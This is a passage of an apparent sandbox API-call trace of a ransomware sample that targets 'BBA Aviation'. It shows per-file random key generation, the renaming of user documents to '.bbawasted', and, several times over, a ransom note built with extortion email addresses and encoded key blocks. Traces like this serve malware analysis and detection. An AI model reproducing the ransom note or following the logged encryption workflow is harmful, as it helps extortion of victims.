lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\zo_QeWnuo2.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\zo_qewnuo2.jpg.bbawasted")) returned 1 [0211.822] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Desktop\\zo_QeWnuo2.jpg.bbawasted" (normalized: "c:\\users\\fd1hvy\\desktop\\zo_qewnuo2.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0211.822] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0211.823] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x10d61 [0211.823] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10d61) returned 0x5f0000 [0211.823] CloseHandle (hObject=0x28c) returned 1 [0211.831] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0211.831] CloseHandle (hObject=0x27c) returned 1 [0211.832] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0211.832] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a68a0) returned 1 [0211.832] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0211.833] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0211.833] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6570) returned 1 [0211.833] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0211.834] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0211.846] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0211.846] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0211.847] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0211.847] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]JkrcSUK0Nf0+GfFzbelchtNvjR5tdaRmj/R2z6XLVwDcANt4p1u1OSXXaFw6WuuV\r\nU7+ytt2ShYHqPI4hklJgLgjWXZV6fYTv91Ktzvlom4lT3R3DGxXY3o9Yt0hbO3Ig\r\netr1mpkxxlKJx7wxM0qjwULr3xW9lk2mjhiYLKmpaYb2gXkQ4nLL9Xv/WvYAUS6L\r\ntGzrIaAwuqedWUz1jKvyTqITPhVcdbW17pA+55H5EFtVN/wYpTUm4B7wunGPO299\r\nEgfzP+9g0Oi7ZtASDSvRvfw62zQwcFj/Km4LVEJFDmHi6azIwu31JkOAf0TxjbJ5\r\nc1D5DkCgbQwAlLw1Mds+62fOiOjfiRBL1kqAICY/BEAUJXpkEsOv5MSgPSJVJ4n+\r\n787OEPRkKPqMD8OX7rtoJ9Hdmy6Ea0yUO+c6PwBo/7P1A0uBj0PXL4lRzaEHt7XZ\r\nT6HksFNOZX3U6RZXOmY/WcRpsohJD1XZaUVzYd6dt42ChLteVQABPCrh7lzyAyes\r\nqRtJv64PbgIeWPvihGEx+WTWOY5EJSB05w7qlO8ilxq5wa7cAavglfs4wcXscBpu\r\nzsSJ6YDLwC1MiX2CY+KOYRtsJxkG63T/XEdgtB98ImjBmybzjwUwzEDsXq3wpXw+\r\nDSHGRyFKGTNrlKJ7IkEEaV1T5bmUsOMHjC8gN9BgY6Z=[end_key]\r\nKEEP IT\r\n") returned 984 [0211.847] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0211.847] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0211.847] SetEndOfFile (hFile=0x290) returned 1 [0211.997] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0211.997] CloseHandle (hObject=0x290) returned 1 [0212.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0212.000] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a4ae8 | out: hHeap=0x660000) returned 1 [0212.000] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0212.001] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0212.001] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0212.001] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\476iG93Vi.ppt") returned 43 [0212.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x260) returned 0x6adb18 [0212.001] lstrcpyW (in: lpString1=0x6adb6e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0212.001] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.001] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a68a0) returned 1 [0212.002] CryptGenRandom (in: hProv=0x6a68a0, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0212.002] CryptReleaseContext (hProv=0x6a68a0, dwFlags=0x0) returned 1 [0212.002] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\476iG93Vi.ppt.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\476ig93vi.ppt.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0212.004] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0212.006] SetEndOfFile (hFile=0x290) returned 1 [0212.006] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.006] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.006] lstrcpyW (in: lpString1=0x6adb6e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0212.006] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\476iG93Vi.ppt" (normalized: "c:\\users\\fd1hvy\\documents\\476ig93vi.ppt"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\476iG93Vi.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\476ig93vi.ppt.bbawasted")) returned 1 [0212.007] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\476iG93Vi.ppt.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\476ig93vi.ppt.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0212.008] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0212.008] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x1628 [0212.008] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1628) returned 0x5f0000 [0212.008] CloseHandle (hObject=0x28c) returned 1 [0212.013] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0212.013] CloseHandle (hObject=0x27c) returned 1 [0212.013] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0212.013] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6a38) returned 1 [0212.014] CryptGenRandom (in: hProv=0x6a6a38, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0212.014] CryptReleaseContext (hProv=0x6a6a38, dwFlags=0x0) returned 1 [0212.014] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6928) returned 1 [0212.015] CryptGenRandom (in: hProv=0x6a6928, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0212.015] CryptReleaseContext (hProv=0x6a6928, dwFlags=0x0) returned 1 [0212.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6aecf0 [0212.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0212.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.027] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]HnOiLLNRkk0ethWxV6FTjT8tJ5hKUdHUsXU+vd3jhvAusC2pmyHChoHSsDOT90cL\r\nY2e6frZjCI52A6XYjbIKTNqq8bbC/jf6ecdfUKbStVhCXCWzbb8JGwYK2pW/tf/i\r\nHajFv4Vsl8j8+hgMSr8ljMXmB3cN5sKYeHaaU24WH+JVJsw8Vkf7dGovP63o3VEN\r\nLYKFoEYZZzzoug2lEiF2rzCQDeaJq7JXmqddmDpMcktiKyRVikddu9r8cfA+HY+6\r\ngXXFj30bAwqfjgRuEAGBvtheIB224FLqoKUqwLrPlEC/YTIdHhBI+oWcuPyWdTqx\r\nKPhnpSPpjSSCxVUDU/No+0Nf8B7WR/078ttcXEb3frXq8bGSgbh68kW9TN0h42M2\r\nknF7XnzT6OsEKe/cCFyriEmJIlErHrMEAA2n+L9vbdtkx60dFXoyn+Z3CaDHk3mJ\r\nttxfLEOZR2UUBNvG0ABRws+qZR3pHL5rBj8U2F+Ly4LYT29va5arduGe8keU8WkZ\r\nBd/ptVHjAZ3cXw5NTA4Tww5McWrguGTmlxfi1JT9sAtKmFnUgPRCDKDzM8Hkr4ko\r\njvRDKZry8luZ3VGwMHOmC7r0X7paEkiKts5vJQ1783izz9ttalhkye3kCjdefs7K\r\ny/d7ZJeJ39k56J2fL3XbS41s0n7gg7As7XuqPi86bbw=[end_key]\r\nKEEP IT\r\n") returned 984 [0212.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0212.027] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0212.028] SetEndOfFile (hFile=0x290) returned 1 [0212.031] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.031] CloseHandle (hObject=0x290) returned 1 [0212.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6adb18 | out: hHeap=0x660000) returned 1 [0212.036] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a42a8 | out: hHeap=0x660000) returned 1 [0212.037] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6c58) returned 1 [0212.037] CryptGenRandom (in: hProv=0x6a6c58, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0212.037] CryptReleaseContext (hProv=0x6a6c58, dwFlags=0x0) returned 1 [0212.037] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4bZG9nnAFK V9iapNmDo.docx") returned 55 [0212.037] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x278) returned 0x6aecf0 [0212.038] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0212.038] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.038] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0212.038] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0212.038] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0212.038] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4bZG9nnAFK V9iapNmDo.docx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\4bzg9nnafk v9iapnmdo.docx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0212.039] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0212.041] SetEndOfFile (hFile=0x290) returned 1 [0212.041] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.041] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.041] lstrcpyW (in: lpString1=0x6aed5e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0212.041] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4bZG9nnAFK V9iapNmDo.docx" (normalized: "c:\\users\\fd1hvy\\documents\\4bzg9nnafk v9iapnmdo.docx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4bZG9nnAFK V9iapNmDo.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\4bzg9nnafk v9iapnmdo.docx.bbawasted")) returned 1 [0212.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\4bZG9nnAFK V9iapNmDo.docx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\4bzg9nnafk v9iapnmdo.docx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0212.042] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0212.042] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x15cbd [0212.043] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x15cbd) returned 0x5f0000 [0212.043] CloseHandle (hObject=0x27c) returned 1 [0212.470] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0212.471] CloseHandle (hObject=0x28c) returned 1 [0212.471] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0212.471] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6d68) returned 1 [0212.471] CryptGenRandom (in: hProv=0x6a6d68, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0212.471] CryptReleaseContext (hProv=0x6a6d68, dwFlags=0x0) returned 1 [0212.472] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6b48) returned 1 [0212.472] CryptGenRandom (in: hProv=0x6a6b48, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0212.472] CryptReleaseContext (hProv=0x6a6b48, dwFlags=0x0) returned 1 [0212.481] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0212.481] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0212.481] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.481] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]PCjEXlXv6ZCCZDNz9QN+7exTxm3d8m0QW5rP1AsPrdjtvFtbO+9W3eWEQOqrtcDo\r\nuUyfi7A3D3j+74uy/uvyf3CwsAxeLZ1dn+6rBd47O5VnfI9+WdWX16lPLi9P3qbN\r\nfo/3qpU0REqFv5UgwIWPzArO/CYXaU8nuE7mXfm6/NMz3dvBSYI8Q/+wzVQ+3Id3\r\nhfxTW9Yp/neUYzg6wRQx+9Z9SaEuPkygItg/ZlNgl/vHN4ERnj5hI9XLMn/fYVxz\r\nfAhri4EpVtE3fDazyNgUEKMAOL5rZWS0eo++YxXErHrRSIRdOZYkBmgr2/6UiiKt\r\nIQdGAsnHU+kw5kA9wD7Ac4Jv7MZJr5mxEjTjifsDYmC9hSSV6kmIR7ZqNnpIhsKy\r\nN4xcfjSf/44iRuT/2IRGfGLxqZVVhQ+EPoyoueMjxBY34iQcjSqgopd9KqPDsemk\r\nwZoKXbxuUFvPxcGFphVVS91ee5OuAGeA7RQHhCHN48c8okgsBC4INtnp8cZyPzp9\r\n0i0b7XQ1db7sueFLwlJveMcMTaLoBGfweG9cI562YrnBzihvxv5tTsGTzWlO8ZaR\r\nd2jNO3IDT7wY1TTxwOr5Nv7LnmPquHGCCLAPcODEB6qJGPiaql7QOB47E4XcBpDy\r\naK8iE5eOtefHuapN3AOKOQBqSzRcJrV70lz1XKis3GK=[end_key]\r\nKEEP IT\r\n") returned 984 [0212.481] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0212.481] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0212.481] SetEndOfFile (hFile=0x290) returned 1 [0212.484] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.484] CloseHandle (hObject=0x290) returned 1 [0212.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6aecf0 | out: hHeap=0x660000) returned 1 [0212.488] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b0970 | out: hHeap=0x660000) returned 1 [0212.488] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a62c8) returned 1 [0212.489] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0212.489] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0212.489] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Documents\\5sPV_sRBv-RXg iHTC0.xlsx") returned 54 [0212.489] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x276) returned 0x6aecf0 [0212.489] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0212.489] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0212.489] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6350) returned 1 [0212.490] CryptGenRandom (in: hProv=0x6a6350, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0212.490] CryptReleaseContext (hProv=0x6a6350, dwFlags=0x0) returned 1 [0212.490] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\5sPV_sRBv-RXg iHTC0.xlsx.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\documents\\5spv_srbv-rxg ihtc0.xlsx.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0212.491] WriteFile (in: hFile=0x290, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0212.492] SetEndOfFile (hFile=0x290) returned 1 [0212.492] SetFilePointer (in: hFile=0x290, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0212.492] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0212.492] lstrcpyW (in: lpString1=0x6aed5c, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0212.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\5sPV_sRBv-RXg iHTC0.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\5spv_srbv-rxg ihtc0.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\5sPV_sRBv-RXg iHTC0.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\5spv_srbv-rxg ihtc0.xlsx.bbawasted")) returned 1 [0212.493] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\5sPV_sRBv-RXg iHTC0.xlsx.bbawasted" (normalized: "c:\\users\\fd1hvy\\documents\\5spv_srbv-rxg ihtc0.xlsx.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0212.493] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0212.493] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x61b1 [0212.493] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x61b1) returned 0x5f0000 [0212.494] CloseHandle (hObject=0x28c) returned 1 [0212.706] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0212.706] CloseHandle (hObject=0x27c) returned 1 [0212.706] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0212.706] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a64e8) returned 1 [0212.707] CryptGenRandom (in: hProv=0x6a64e8, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0212.707] CryptReleaseContext (hProv=0x6a64e8, dwFlags=0x0) returned 1 [0212.707] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a62c8) returned 1 [0212.708] CryptGenRandom (in: hProv=0x6a62c8, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0212.708] CryptReleaseContext (hProv=0x6a62c8, dwFlags=0x0) returned 1 [0212.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0212.719] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0212.719] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a8fa8 [0212.719] _snwprintf (in: _Dest=0x6a8fa8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE 